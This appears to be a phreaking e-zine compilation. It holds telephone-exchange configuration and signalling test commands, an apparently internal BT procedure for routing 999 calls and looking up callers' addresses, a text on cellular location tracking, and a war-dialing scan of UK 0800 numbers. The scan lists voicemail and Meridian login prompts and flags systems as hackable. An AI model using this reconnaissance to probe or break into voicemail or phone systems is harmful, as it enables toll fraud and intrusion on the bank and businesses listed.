Insertion of Band Data.
===========================================================================
Define Band Data with 2 CSG's for ETC-32.
<C6BDI:SRS=1,CSG=1,LS=L032,BAND=1;
<C6BDI:SRS=1,CSG=2,LS=L032,BAND=2;
<C6BDI:SRS=2,CSG=1,LS=L132,BAND=1;
<C6BDI:SRS=2,CSG=2,LS=L132,BAND=2;
Define Band Data with 2 CSG's for ETC-24.
<C6BDI:SRS=3,CSG=1,LS=L024,BAND=1;
<C6BDI:SRS=3,CSG=2,LS=L024,BAND=2;
<C6BDI:SRS=4,CSG=1,LS=L124,BAND=1;
<C6BDI:SRS=4,CSG=2,LS=L124,BAND=2;
Data for looped ETC-32 devices.
Define a route for the outgoing side of the loop.
<EXROI:R=BT6320I&BT6320O,DETY=BTN6D32,FNC=3;
<EXRBC:R=BT6321I,R2=TCN6;
Define a route for the outgoing side of the loop.
<EXROI:R=BT6321O&BT6321I,DETY=BTN6D32,FNC=3;
<EXRBC:R=BT6321I,BO=101;
Connect Circuits to Routes
Note : MISC1 = CIRC, CIRCUIT NO within CSG
MISC2 = SRS, as defined above in Signalling data.
MISC3 = CSG, as defined above in Signalling data.
MISC4 = 0
HNB = Hunting Number. (H'FF00 ==> allocation down)
Devices 1,33,34 and 97 were used for signalling links.
Channels 0 and 16 are not available for speech.
Devices in looped ETC pairs MUST have
corresponding CIRC, SRS, CSG when connected.
<EXDRI:R=BT6320I&BT6320O,DEV=BTN6D32-2&&-15&-17&&-31,
MISC1=0,MISC2=1,MISC3=1,MISC4=0,HNB=1 ! SRS=1,CSG=1;
! 29 devices
<EXDRI:R=BT6320I&BT6320O,DEV=BTN6D32-66&&-79&-81&&-95,
MISC1=0,MISC2=1,MISC3=2,MISC4=0,HNB=30 ! SRS=1,CSG=2;
! 29 devices
<EXDRI:R=BT6321I&BT6321I,DEV=BTN6D32-34&&-47&-49&&-63,
MISC1=0,MISC2=2,MISC3=1,MISC4=0,HNB=H'FF00 ! SRS=2,CSG=1;
! 29 devices.
<EXDRI:R=BT6321O&BT6321I,DEV=BTN6D32-98&&-113&-115&&-127,
MISC1=0,MISC2=2,MISC3=2,MISC4=0,HNB=H'FF00 ! SRS=2,CSG=2;
! 29 devices.
===========================================================================
Data for looped ETC-24 devices.
Define a route for the outgoing side of the loop.
<EXROI:R=BT6240I&BT6240O,DETY=BTN6D24,FNC=3;
<EXRBC:R=BT6240I,R1=TC;
Define a route for the outgoing side of the loop.
<EXROI:R=BT6241O&BT6321I,DETY=BTN6D24,FNC=3;
<EXRBC:R=BT6241I,BO=101;
Connect Circuits to Routes
Note : MISC1 = CIRCUIT NO within CSG
MISC2 = SRS, as defined above in Signalling data.
MISC3 = CSG, as defined above in Signalling data.
MISC4 = 0
HNB = Hunting Number. (H'FF00 ==> allocation down)
Devices 0,24,48 and 72 were used for signalling links.
Devices in looped ETC pairs MUST have
corresponding CIRC, SRS, CSG when connected.
<EXDRI:R=BT6240I&BT6240O,DEV=BTN6D24-1&&-15,
MISC1=0,MISC2=3,MISC3=1,MISC4=0,HNB=1 ! SRS=3,CSG=1;
<EXDRI:R=BT6240I&BT6240O,DEV=BTN6D24-16&&-23,
MISC1=0,MISC2=3,MISC3=2,MISC4=0,HNB=16 ! SRS=3,CSG=2;
<EXDRI:R=BT6241O&BT6241I,DEV=BTN6D24-25&&-39,
MISC1=0,MISC2=4,MISC3=1,MISC4=0,HNB=H'FF00 ! SRS=4,CSG=1;
<EXDRI:R=BT6241O&BT6241I,DEV=BTN6D24-40&&-47,
MISC1=15,MISC2=4,MISC3=2,MISC4=0,HNB=H'FF00 ! SRS=4,CSG=2;
PBX data and Routing Cases
Define data for BL's for test calls
If necessary, define a PBX hunt group using BL's.
SUPRI:SNB=1100,DETY=BL,PXR=B-0,R1=KR;
SUPRC:SNB=1100,DETY=BL,PXR=B-0,PXRD=RSV-1;
SUPLI:SNB=1101,DEV=BL-0,PBXMN=0,PXR=B-0;
SUPLI:SNB=1102,DEV=BL-1,PBXMN=1,PXR=B-0;
SUPLI:SNB=1103,DEV=BL-2,PBXMN=2,PXR=B-0;
Define an EOS for RC congestion.
ANESI:ES=500,F=0,M=0-1102;
Routing Cases.
Define new Routing Cases for ETC-32 speech routes.
<ANRPI:RC=200;
<ANRSI:PA=1,R=BT6240O,SP=331;
<ANRSI:PA=2,ES=500;
<ANRPE;
Define new Routing Cases for ETC-24 speech routes.
<ANRPI:RC=201;
<ANRSI:PA=1,R=BT6320O,SP=331;
<ANRSI:PA=2,ES=500;
<ANRPE;
<ANRAI:RC=200&201;
B-number Analysis.
ETC-32
These are the digits to be dialled to access the speech routes.
Dial : 6320 to occupy all devices in BT6320O & terminate to 1102.
Dial : 6321xxxx to occupy one device in BT6320O & terminate to xxxx.
Outgoing Data
<ANBSI:B=0-6320,RC=200,L=4;
<ANBSI:B=0-6321,RC=200,L=4;
Incoming Data
<ANBSI:B=100-0,N=0; ( Strip of info digit)
<ANBSI:B=101-1,N=0; ( Strip of info digit)
ETC-24
These are the digits to be dialled to access the speech routes.
Dial : 6240 to occupy all devices in BT6240O & terminate to 1102.
Dial : 6241xxxx to occupy one device in BT6240O & terminate to xxxx.
Outgoing Data
<ANBSI:B=100-6240,RC=201,L=4;
<ANBSI:B=100-6241,RC=201,L=4;
<ANBAI;
===========================================================================
Test of Signalling Terminals.
===========================================================================
1 Deblock the Sig. Terminals. <BLODE:DEV=C6ST- ;
===========================================================================
2 Check the state of the deblocked <STRDP:R=C6ST;
Signalling Terminal.
===========================================================================
3 If any C6ST's are ABL, print out
CCITT6 SIGNALLING TERMINAL DIAGNOSTICS <C6TDP;
Check printout, CCITT SIGNALLING TERMINAL DIAGNOSTICS
DEV FCODE MAG BOARD
FCODE = 21 ==> C6ST - MODEM connection
FCODE = 22 ==> MODEM - PCD connection
===========================================================================
4 Repair any faults found in steps 2-3.
===========================================================================
NOTE - Signal Terminal Diagnostics are carried out autonomously
and the command C6TDP only prints out the result if any
are faulty.
===========================================================================
Activation of Signalling Links.
===========================================================================
1 Configure the exchange as shown in section 6.
===========================================================================
2 Deblock all Signalling Terminals. <BLODE:DEV=dev...;
Check that all are IDLE. <STRDP:R=C6ST;
===========================================================================
3 Deblock the Signalling Links in the <C6LBE:LS=ls,SL=sl...;
Link Sets defined in section 6.
The first IDLE C6ST will be selected
and a semi permanent connection will
be set up between it and the BT connected
to the SL.
Wait for Synchronization.
Print Link Set configuration. <C6LCP:LS=ls;
Check that the SLSTATUS for the regular
link is WORKING, and that a C6ST is
connected.
===========================================================================
4 Check that the C6ST is SEBU. <STRDP:R=C6ST;
===========================================================================
5 Repeat steps 3 and 4 for all SL's.
===========================================================================
6 Check which C6ST's are SEBU. <STRDP:R=C6ST;
If all are, then continue to
next section.
===========================================================================
7 Block all Signalling Links in the <C6LBE:LS=ls,SL=sl...;
Link Sets defined in section 6.
===========================================================================
8 Block all THE C6ST'S that were SEBU <BLODI:DEV=C6ST-.....;
in step 6.
===========================================================================
9 Repeat steps 3 - 8 until all C6ST's
have been used in Signalling Links.
===========================================================================
Test of looped ETC's
===========================================================================
1 Refer to data in section "Test Data".
Make necessary physical connections
between ETC magazines.
===========================================================================
2 Check that the O/G routes are deblocked. <BLORP;
Deblock all test routes that are blocked <BLORE:R=route;
===========================================================================
3 Deblock one magazine of BT's in BT6320O <BLODE:DEV=dev...;
and BT6321I. Check that they go IDLE.
(In case of C6-24, do BT6240O&BT6241I;)
===========================================================================
4 Make a call over the loop. Check the call
is successful and that all of the devices <STRSP:R=BT6320I1&BT6321I;
deblocked in BT6320O and the corresponding DEVICE STATE SURVEY
devices in BT6321I are seized.
(For C6-24, check BT6240O&BT6241I)
===========================================================================
5 Repeat the test two or three times for each
magazine.
===========================================================================
6 Block the devices tested in BT6320O and <BLODI:DEV=dev...;
deblock the devices in the next magazine <BLODE:DEV=dev...;
to be tested.
===========================================================================
7 Repeat steps 1 to 6 until all magazines
of BT's for CCITT No.6. are tested.
===========================================================================
8 Remove all loops and restore data to normal.
===========================================================================
HELPFUL HINTS
1. Note - The BT that is connected to the Signalling
---- Terminal is normally MANUALLY BLOCKED and goes
to state SEBU when connected to a Sig. Link.
===========================================================================
2. Note - When Sig.Terminals are deblocked they try to
---- synchronize to themselves by forming a loop
through the GSD.
When ST's are connected (in data) to a Sig. Link
a semi-permanent conn. is formed through the GSD.
This conn. remains until the Sig. Link is blocked
then it is released.
===========================================================================
3. Note - The Transceiver is used to transmit a 2 KHz check
---- tone at the beginning of a call and is then
released.
===========================================================================
4. Note - All commands are with relation to Exch. A.
----
===========================================================================
5. Note - It is helpful to draw a diagram of your
---- configuration with numbers of Sig. Links,
Link Sets etc.
===========================================================================
--bRAiN5tOrM--potgirl-- Shouts to POTS, d4rkcyde, 9x, b4b0, SEH
BT Operator 999 Emergency Call Routing Procedure.
D4RKCYDE <http://f41th.com>
hybrid/psyclone/grip.
-----------------------------------------------------------------------------
ROUTING 999 EMERGENCY CALLS VIA NUMBER RANGE
-D4RKCYDE
-----------------------------------------------------------------------------
The BT Operator will receive an Emergency Call originating from an
OPERATOR number. An onscreen indicator will alert the BT Operator that the
Call has originated from an OPERATOR number. A full Calling Line Identity
(CLI) will be shown.
The National Number Group (NNG) and D,E or F digits, as appropriate, will
generate the appropriate Emergency Organisation connect to numbers. The
Call will be answered and connected following BT standard operating
procedures.
NAME AND ADDRESS CHECKS
-----------------------
Obtaining name and address information in the event of a request from the
Emergency Organisations in connection with an Emergency Call. During or
after an Emergency Call the Emergency Organisation Operator may ask the
BT Operator to determine the name and address associated with the caller's
'phone number. This will be achieved by the BT Operator contacting a
staffed name and address enquiry point at the OPERATOR's premises. Name
and Address Enquiry Point
The OPERATOR will provide BT with a direct, fixed line, 24 hour enquiry
point. There should be more than one number for resilience. The OPERATOR
will attempt to answercalls within 15 seconds and provide the name and
address within a maximum of 30 seconds from the BT Operator calling the
number. In the event of the BT Operator being asked to provide a name and
address by the Emergency Organisation the BT Operator will 'phone through
to the name and address enquiry point at the OPERATOR's operations centre.
The OPERATOR's operations centre will give priority of answer to these
calls. The BT Operator will identify themselves, quote the CLI number and
ask for a name and address associated with the number. The OPERATOR's
operator will relay over the 'phone the name and address.
The OPERATOR must quote the installation address associated with the
number, not the billing address. The OPERATOR will be responsible for the
accuracy of the information on the database. The BT Operator will pass the
details back to the Emergency Organisation.
Online Access If available, the BT Operator will access the OPERATOR's
customer records database directly to obtain the name and address. The
address shown to the BT Operator must be the installation address. There
must be a 24hr staffed contact point which the BT Operator can access in
the event of a failure of the online system.
ROUTING 999 EMERGENCY CALLS VIA CUSTOMER'S POSTCODE
---------------------------------------------------
The BT Operator will receive an Emergency Call originating from an
OPERATOR number. An onscreen indicator will alert the BT Operator that the
call has originated from an OPERATOR number. A full calling Line Identity
(CLI) and full customer's name and address will be shown. Based on the
customer's postal code, will generate the Emergency Organisation connect-
to numbers. The call will be answered and connected following BT standard
operating procedures.
EMERGENCY CALL ROUTING - VIA NUMBER RANGE
-----------------------------------------
Definition: The method by which it is determined which Emergency
Organisation control room a Customer is connected to in the event of an
Emergency Call, via the customers' telephone number, (the full Calling
Line Identity).
Background: When an Emergency Call is presented to a BT Operator the CLI
generates the appropriate list of connect to numbers for Fire, Police,
Ambulance, Coastguard and Mountain Rescue. Historically, for BT Customers,
this has required overlaying the Emergency Organisation boundaries onto BT
exchange boundaries. In cases where an Emergency Organisation boundary
cuts through a BT exchange boundary there are two solutions. By mutual
agreement one or other neighbouring Emergency Organisation will agree to
take all the Emergency Calls within the BT exchange boundary and therefore
the routing is determined by NNG alone. This is practical where only a
small proportion of the BT exchange boundary lies within an Emergency
Organisation boundary. Alternatively the traffic is split by using D, E or
even F digit discrimination. In this case BTOSS is programmed to examine
the CLI down to the relevant digit and generate the correct Emergency
Organisation listing page.
Out of Area Numbers
-------------------
If the OPERATOR offers out of area numbering schemes to its Customers
(usually business PBXs) then they should ensure that Emergency Calls are
routed out on an appropriate local geographical number so that when the
call is presented to the BT Operator a correct local number is displayed.
Geographic Routings
-------------------
It will be necessary to cross reference the OPERATOR's boundaries with BT
exchange boundaries and the Emergency Organisation boundaries. The
OPERATOR must provide BT with a map showing theboundary for each area of
coverage. This mustbe on an Ordnance Survey map to the scale of 1:50000.
The responsibility for the accuracy of the boundaries lies with the
OPERATOR. If necessary, the ESM(see below) will assist in the preparation
of a map.
Where the OPERATOR has no defined boundary the OPERATOR will need to
follow the appropriate National Number Group (NNG) boundary. e.g. if the
OPERATOR has been allocated a DE range from the 0113 NNG they will need to
follow the 0113 NNG boundary. BT will provide an overlay with the NNG
boundary and BT local exchange boundaries. The OPERATOR will be
responsible for allocating number blocks down to "F" digit to align with
BT exchange boundaries. The numbering scheme will need to be shared with
BT so that the call routing plan can be loaded onto the call handling
system.
When completed, a list showing which number ranges have been allocated to
each local exchange area should be sent to the BT Operator Services
Marketing Support Manager (O&M) who will be responsible for ensuring that
call routing tables are built. This information should be provided two
months prior to BIS date.
New Number Ranges
-----------------
If the OPERATOR applies for new number ranges then consideration must be
given by the OPERATOR to 999 planning. If the OPERATOR has only been
operating part of the operational area and has applied for new number
ranges to expand operations to new parts of the operational area then the
process described above will need to be repeated. OS will require a
minimum of four months notice.
ROLE OF EMERGENCY SERVICES LIAISON MANAGER
------------------------------------------
BT will provide the services of an Emergency Services Manager (ESM) to
support the OPERATOR in the initial provision of Emergency Service and to
provide ongoing liaison between the OPERATOR and the Emergency
Organisations. The ESM will not be dedicated to the OPERATOR but will
also serve BT Customers.
Implementation - General Tasks
------------------------------
The ESM will be responsible for planning the routings of Emergency Calls
from the OPERATOR's Customers to the relevant Emergency Organisation
control rooms.
Ongoing Liaison
---------------
The ESM will act as the interface between the OPERATOR and the Emergency
Organisations to provide the same liaison functions as for BT and its
Customers. The ESM will work in conjunction with the OPERATOR's Customer
Services to resolve any difficulties or queries arising from the provision
of Emergency Service. These functions will include:-
i) Working with the OPERATOR's Customer Services to resolve Emergency
Call complaints.
ii) Answering general enquiries from the OPERATOR about the Emergency
Call Service, for example, quality of service issues.
iii) Ensuring that any changes to the OPERATOR's area are reflected in
the routing plan and Emergency Organisation listing pages are revised
accordingly.
iv) Assisting Emergency Organisations with queries about Emergency
Calls originating from the OPERATOR's System.
Home Office Liaison
-------------------
BT will not be responsible for liaison between the OPERATOR and the Home
Office about Emergency Call issues.
COMPLAINT PROCESS
-----------------
Complaints by Customers about the Emergency Call service will be received
by the BT Operator Assistance Centre, BT Service Management Centre (SMC)
or by the OPERATOR's Customer Services.
Complaints Received by an Operator Assistance
Centre
----------------------------------------------------
Complaints will be handled in accordance with the BT Complaint Handling
process with appropriate liaisonwith the OPERATOR's Customer Services.
Complaints Received by the OPERATOR's Customer Services
-------------------------------------------------------
If the OPERATOR's Customer Services receive a Customer complaint about an
Emergency Call they should contact the ESM for assistance to investigate
the complaint. The ESM will require the originating number of the Call,
the Time and Date and the nature of the complaint. For example, if the
alleged complaint is about a long time to answer by BT then the ESM will
examine the tape or dockets as appropriate and report back to the
OPERATOR's Customer Services whether the fault is with BT or the Emergency
Organisation. If the OPERATOR requests access to an Emergency Call tape in
connection with a Customer complaint they should contact the ESM. This
will either be provided in the form of a transcript or a tape recording.
The ESM will determine which format is most appropriate e.g. a transcript
if the recording is very faint. It is recommended that if a recording or
transcript is provided that the ESM should discuss the contents with the
OPERATOR's Customer Services as the correct interpretation of tapes or
transcripts requires some expertise.
Police Investigations
---------------------
If copies/transcripts/access to the tapes are required by the Police for
the investigation of crime then existing BT procedures will apply and the
request will be handled by the ESM.
------------------------------------------------------------------------------
<hybrid_> BEEP
<hybrid_> BEEP
<hybrid_> BEEP
<kpst> Pleep.
<nynexphre> Chip-KerChunk
<hybrid_> clunk
<kpst> Kerchunk.
<hybrid_> prrrrrrrrrrr
<nynexphre> budah budah budah bud
<nynexphre> Chip
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Cellular Tracking More Indepth
by Tradeser <tollphree.com>
------------------------------------------------------------------------------
After releasing my text on Methods Used To Track Cellular
Phones in F41th 12, I was kinda dissapointed on how I didn't
go more indepth on how each tracking method works. This led
me on to a venture to find more information about cellular
tracking. For all of you that don't know, my summer job
before college was working for a wireless provider in my
area. This gave me access to a large database of information,
yet getting it would prove hard. After making numerous calls
to our wireless fraud depatment, some information on Measure
Angle Of Arrival and Measuring Time Difference Of Arrival was
faxed to my work place. I have typed up what they sent me.
[.Snip.]
Measure Angle Of Arrival
Another technique that uses existing mobile device signals to
estimate location is known as angle of arrival or direction
finding. Angle of arrival has been well developed among
military and government organizations since it operates with
no modification to mobile devices. The technique requires a
complex antenna array an arrangement of several antennae
in a precise, fixed pattern at cell site locations. Antenna
arrays, in principle, work together to determine the angle
(relative to the cell site) from which a mobile signal
originated. When angles of arrival are computed for several
cell sites, the mobile units location can be estimated based
on the point of intersection of projected lines drawn out
from the cell sites at the angle from which the signal
originated. An angle of arrival system can perform well
when tracking a continuous transmission, such as a voice
transmission. The system must follow each voice channel
assignment as a caller moves from cell to cell, and the call
is handed off from channel to channel. This can be difficult
if the angle of arrival antennae are not positioned to
interpret the in-band voice channel signaling. It is more
difficult to use angle of arrival to compute the location
of a mobile unit emitting brief (one-tenth of one second)
reverse control transmissions. It may also be difficult to
use angle of arrival based on digital voice channel
transmissions and data transmissions because of the brevity
of the signals and the channel sharing that exists. Another
significant drawback to angle of arrival systems is the
logistical and aesthetic dilemma of adding antenna arrays
(that can number from four to 12, depending on the angular
resolution required) to cell sites at a time when communities
are enacting increasingly harsh zoning regulations. Also the
accuracy of angle of arrival systems is reduced as a mobile
unit moves away from a cell site. To illustrate this problem,
think of cutting a triangular pizza slice. The transmitter is
moving away from the tip of the slice. As it moves farther away,
the ambiguity (or width) of the pizza slice becomes greater even
though the angle of the cut remains constant. Angle of arrival
also is extremely sensitive to wide angle reflections (known
as multipath reflections) that occur when a mobile devices
transmissions reflect off natural and man-made structures,
particularly buildings and mountains. These reflections can
have power stronger than the direct path taken by the signal
from the mobile unit to the antenna array. These multipath
reflections can trick an antenna array into calculating an
incorrect angle. For this reason, continuous reverse voice
channel transmissions are more desirable than brief reverse
control channel transmissions for angle of arrival systems
because continuous reverse voice transmissions give angle of
arrival systems time to attempt to resolve ambiguities due to
multipath reflections. Angle of arrival technology may lend
itself to the future use of smart antennae, which are compact
antenna arrays that shape the cell site transmitter and receiver
signals into a beam that focuses on the mobile unit and ignores
other signals. Although potentially expensive, these antennae
could improve call quality.
[.Snip.]
Measuring Time Difference Of Arrival
Time difference of arrival is another well known technique used
for determining the locations of mobile devices. Time
difference of arrival has been used since radar systems were
first invented over 50 years ago and is used with GPS technology
today. It is well suited to estimating location of all wireless
devices because it works with both brief transmissions, such as
the reverse control channel, and with longer transmissions, such
as the reverse voice channel. These systems work on the basis of
a highly precise timing of a mobile units signal as the
transmission is received at various cell sites. From the precise
timing, appropriate triangulation can be performed to estimate
position, as well as speed and direction of travel. In contrast
to angle of arrival systems, the distance from the transmitter
to any cell site is not a factor in accurate timing, and
therefore does not degrade accuracy. Also, in contrast to both
measured power and angle of arrival systems, time difference of
arrival systems do not require that the signal be received at any
appreciable power level (i.e. relative to the background noise
level in the wireless band).
For many applications, time difference of arrival offers many
positive benefits. The system requires no modifications to
existing mobile devices, regardless of modulation protocol. Thus
all of the existing 22 million8 analog cellular telephones could
be supported. As with other locating techniques, time difference
of arrival systems typically require the addition of new equipment
at cell sites though existing antennae can be used in many cases.
Where existing antennae are not available, simple whip antennae
(i.e. the type of cellular antennae on most car windows) can be
used.
Because antenna requirements are simple and unobtrusive, time
difference of arrival receivers can be put in many locations,
including areas without cell sites. This might be advantageous if
one wanted to improve location estimates in a particular area and
a regular cell site was not required or desired. This simpler
configuration has the added benefit of lower implementation cost
compared to angle of arrival systems.
Though time difference of arrival systems are also affected by the
same multipath reflections that impair angle of arrival systems,
they are affected to a lesser degree because of the superior
timing resolution and frequency resolution characteristics of the
technique. It is generally considered easier to measure time
precisely than to measure angle precisely.
The lower implementation cost of time difference of arrival systems
permits receiver installation at more cell sites, which leads to
a statistical averaging of the multipath reflections,9 especially
required in urban environments where there is a greater density of
man-made structures.
Like angle of arrival, time difference of arrival systems are best
suited for applications requiring the location information at a
central site. Unmodified mobile devices are currently not capable
of displaying position, but the central site can forward the
information to a data receiver.
This wide range of available technology choices each offers at least
one technical fit for each desired application whether it be for an
E-911 system, Billing by Location, fraud detection and prosecution,
System Planning and Design or the hundreds of new applications that
will become available in the next decade.
------------------------------------------------------------------------------
UK Hand Scan of 0800 056 XXXX
by slinkie
------------------------------------------------------------------------------
This scan was done by slinky, mostly late at night and early in the morning
I scanned without dialing 141, various people on this list have run me up
wanting to know why i was ringing their home phone at midnight, etc,
all of this scan was done on my virgin mobile: 07941383089 feel free to
contact me on that, or leave a message on my voice mail box on,
+1 800 6887705 box 4582
slinky
0000 - the number you have dialed has been allocated to lloyds TSB, but
has not been conencted yet
0001 - ring, bleep, long silence, got bored and hung up
0002 - ahu
0003 - ring, ring, the office if now closed, then hung up
0004 - BT, tnchbc 020085026076
0005 - ring, ring, ring, ring, no answer
0006 - voice
0007 - thank you for calling seaboard, answerphone, *# does notihng
0008 - ahu
0009 - ahu
0010 - ring, ring, ring, ring, no answer
0011 - ahu
0012 - ahu
0013 - ring, ring, ring, ring, no answer
0014 - voice
0015 - ring, voice
0016 - slow to connect, modem
0017 - ring, ring, ring, ring, no answer
0018 - ring, ring, ring, ring, voice
0019 - ahu
0020 - ring, ring, ring, ring, no answer
0021 - the number you have dialed has been allocated to lloyds tsb
0022 - ring, ring, unfortinatly the something team are unable to take your
call at this time, answerphone
0023 - ahu
0024 - ring, ring, ring, ring, answer phone lloyds tsb, press * and it drops
into a vmb prompt tells you when you have a valid box, but only
3 attempts
0025 - ring, ring, ring, ring, no answer
0026 - ahu
0027 - the number you have called is temporarily out of service
0028 - plays tones then hangs up
0029 - the number you have dialed has been allocated to lloyds tsb etc.
0030 - welcome to phone bank, i am sorry but our que is over 5 minutes
0031 - allocated to lloyds tsb etc.,
0032 - ring, VERY ban quality answer phone with odd tones, oh or fax, some
soime fuckign odd thing, doesn't sound like a fax either
0033 - ring, ring, ring, ring, no answer
0034 - ahu
0035 - plays music, welcome to the phone bank demonstration line fof
business customers
0036 - ring, ring, lloyds tsb something or other
0037 - ring, ring, ring, voice
0038 - ring, ring, ring, ring, no answer
0039 - ahu
0040 - ring, ring, ring, ring, no answer
0041 - slow to conenct, very slow, voice (with water in the backgroud?!?)
0042 - ahu
0043 - the number you have called is temp out of service
0044 - ahu
0045 - ring, ring, answer, music getting louger, welcome to the phone bank
demonstration line
0046 - thank you for calling lloyds tsb, you can register you passwd etc..
0047 - the number you have called is temmp out of service
0048 - ring, ring, ring, ring, lloyds tsb
0049 - ring, ring, ring, ring, ring, ring lloyds tsb
0050 - ring, ring, ring, ring, voice
0051 - ahu
0052 - recording with music in the background, star 4 help, interesting one
0053 - ahu
0054 - ring ring, answerphone
0055 - temp out of service
0056 - ring, ring, ring , ring lloyds tsb
0057 - voice
0058 - voice
0059 - ring, odd bleep
0060 - go away, call back later
0061 - thank you for caling phone bank, register your passwd
0062 - allocated to lloyds tsb
0063 - please hold
0064 - ring, phone bank, register your passwd
0065 - temp out of service
0066 - ring, ring, ring, ring, no answer
0067 - no answer
0068 - ring, ring, ring, answerphone
0069 - ring, ring, ring, voice
0070 - ring, ring, music playing, welcome to the phone bank express
registration line
0071 - voice
0072 - ahu
0073 - thank you for callng phon bank something or other
0074 - ahu
0075 - ring, ring, phone bank shit again demonstration
0076 - ahu
0077 - ring, ring, ring, ring, good afternoon lloyds tsb voice
0078 - it has not been possible to connect your call, please try again later
0079 - ahu
0080 - ring, ring, phone bank demonstration line
0081 - nother fooking phone bank demonstration line
0082 - answerphone, seems to respond to dtmf
0083 - ahu
0084 - ahu
0085 - ring, ring, ring, ring, no answer
0086 - ahu
0087 - ring, ring, voice, FUCKING Odd woman with payphone bee bop in
background
0088 - ahu
0089 - ring, ring, ring, ring, no answer
0090 - ring, ring, phone bank demonstration line
0091 - ring, phone bank
0092 - ring, ring, ring, ring, no answer
0093 - ring, welcome to insure direct, meridian hidden VMB, press *4 for help
0094 - ring, ring, answerphone, doesn't respond to dtmf
0095 - ahu
0096 - answer phone
0097 - ahu
0098 - answered after 1 ring, then odd quick tones, answerphone, responded
to dtmfs
0099 - ring, ring, no answer
0100 - lloyds tsb
0101 - ring, ring, ring, ring, hello, you call cnnot be taken at the moment
answerphone, easily hackable
0102 - lloyds tsb, voice
0103 - ring, ring, ring, ring, voice dick cooper, started fooking shouting
at me
0104 - answered immediatly, fax bax lloyds tsb
0105 - ahu
0106 - ahu
0107 - two rings, then answered lots of silence, then voice
0108 - btcellnet messaging service, appears to forward to someone's mobile
0109 - ahu
0110 - ring, voice
0111 - welcome to the lloyds tsb travel insurance unit
0112 - meridian, hidden behind a answerphone for help *4
0113 - ring, ring, lloyds tsb voice
0114 - ring, ring, ring, ring, ringno answer
0115 - ahu
0116 - voice
0117 - ahu
0118 - voice
0119 - voice
0120 - ring, ring, thank you for calling lloyds tsb credit card line answer
phone, responds to dtmf
0121 - voice
0122 - lloyds tsb
0123 - ring, ring, ring, lloyds tsb VMB system
0124 - ahu
0125 - slow to conenct, ring, ring, ring, ring, no answer
0126 - c5 bleeps?? no answer
0127 - tones
0128 - 1 ring, then voice
0129 - answer phone, * drops you into a security code prompt
0130 - odd tones
0131 - ring, ring, ring, ring, ring no answer
0132 - answer phone, after loads of ringresponds to dtmf with bleeps
0133 - voice
0134 - ring, ring, ring, ring, answer phone
0135 - ring, ring, ring, ring, no answer
0136 - thank you for calling, we are closed dtmf does nothing
0137 - ring, ring answer phone, VERY bad quality, doesn't respond to dtmf
0138 - ahu
0139 - ahu
0140 - allocated to lloyds tsb
0141 - ring, ring, ring, ring, ring, no answer
0142 - ahu
0143 - ring, ring, ring, ring, no naswer
0144 - ring, ring, ring, ring, no answer
0145 - ahu
0146 - ahu
0147 - ahu
0148 - thank you for calling something solutions, * drops you into a
logon
0149 - ahu
0150 - ring, ring, lloyds tsb
0151 - music in the background, lloyds tsb
0152 - rang lots, answerphone, press * and asks for security code
0153 - odd bleeping
0154 - ahu
0155 - ring, ring, voice
0156 - ring, thank you for calling lloyds tsb scotland responds to dtmf
0157 - ring, ring, ring, answer, wait answer phone, responds to dtmf
0158 - ring, ring, ring, voice
0159 - ring, ring, ring, ring ring, ring, answerphone two digit pin
0160 - ring, ring, lloyds tsb savings and investment line
0161 - lloyds tsb business services, dtmf responds
0162 - ahu
0163 - ring, ring, ring, ring, tone on pickup, answerphone # drops you into
"please enter your id" prompt
0164 - voice
0165 - allocated to lloyds
0166 - lloyds tsb savings and investment line, responds to dtmf
0167 - voice
0168 - phone bank registration line, voice
0169 - lloyds tsb, lists other 0800 numbers to call
0170 - lloyds tsb, pressing * does something
0171 - ring, ring, lloyds tsb same as above
0172 - ring, ring, the sales department is closed responds to dtmf
0173 - meridian mail *7 to log in *4 for help
0174 - welcome to bt callminder? redirected to a home phone
0175 - ahu
0176 - ring, the sales department is closed doesn't respond to dtmf
0177 - the sales department is closed same as above
0178 - ring, same as above
0179 - ring, ring, ring, answered, then waited answerphone, responded to dtmf
0180 - ring, thank you for calling lloyds tsb peronal review line no dtmf
0181 - answer phone
0182 - ring, ring, voice
0183 - ahu
0184 - ring, ring, ring , ring , no answer
0185 - ahu
0186 - voice
0187 - ahu
0188 - ring, insure direct, were closed meridian *4 help *7 mailbox
0189 - ring, ring, answer phone, responded to dtmf
0190 - ring, ring, ring, ring, no answer
0191 - allocated to lloyds tsb
0192 - ring, ring, ring, ring, voice
0193 - ring, ring, ring, ring, bleep, answerphone
0194 - ahu
0195 - ahu
0196 - ahu
0197 - ahu
0198 - ring, ring, ring, ring, ring, no answer
0199 - ring, thank you for calling phone bank customer care
0200 - ahu
0201 - ahu
0202 - ahu
0203 - ring, modem then hung up odd
0204 - ahu
0205 - ring, ring, ring, ring, answer phone, started to play with it and a
bloke picked up, he asked what i was doing and i said "0wning him"
0206 - ahu
0207 - ring, ring, ring, ring, ring, ring, no answer
0208 - ahu
0209 - ahu
0210 - ahu
0211 - slow to connect, ring, ring, ring, ring, ring voice
0212 - ahu
0213 - ahu
0214 - ring, ring, ring, ring, bleep, ring, ring, answerphone
0215 - ring, answerphone
0216 - ahu
0217 - picked up, hung up
0218 - ring, ring, ring, ring, ring, no answer
0219 - ahu
0220 - ahu
0221 - ring, ring, ring, ring, no answer
0222 - ahu
0223 - ahu
0224 - ahu
0225 - ring, ring, voice with a forign accent
0226 - ahu
0227 - the number you have called is temp out of service
0228 - ahu
0229 - ahu
0230 - ring, ring, ring, ring, ring, ring, no answer
0231 - ring, ring bleep, more bleeps odd god fed up and hung up
0232 - ahu
0233 - ahu
0234 - ahu
0235 - ahu
0236 - ahu
0237 - ahu
0238 - ring, ring, ring, ring, ring no answer
0239 - ahu
0240 - ahu
0241 - ring, ring, ring, ring, ring, no answer
0242 - ring, ring, ring, ring, ring, no answer
0243 - ahu
0244 - ring, ring, ring, ring, ring, no answer
0245 - ahu
0246 - ahu
0247 - ring, ring, ring, ring, ring, no answer
0248 - ring, ring, ring, ring, ring
0249 - BT, this number is not accepting calls at present, please try later
I will do thanks ;O
0250 - ahu
0251 - ahu
0252 - ring, ring, ring, ring, ring, no answer
0253 - ahu
0254 - ahu
0255 - ahu
0256 - ahu
0257 - ahu
0258 - ahu
0259 - ahu
0260 - ahu
0261 - ahu
0262 - ahu
0263 - ring, ring, ring, ring, ring, no anseer
0264 - ring, ring, ring, ring, ring, no answer
0265 - ahu
0266 - ahu
0267 - ring, ring, ring, ring, ring, no answer
0268 - the number you have called is temporarily out of service
0269 - ahu
0270 - ahu
0271 - the number you have called is temp out of service
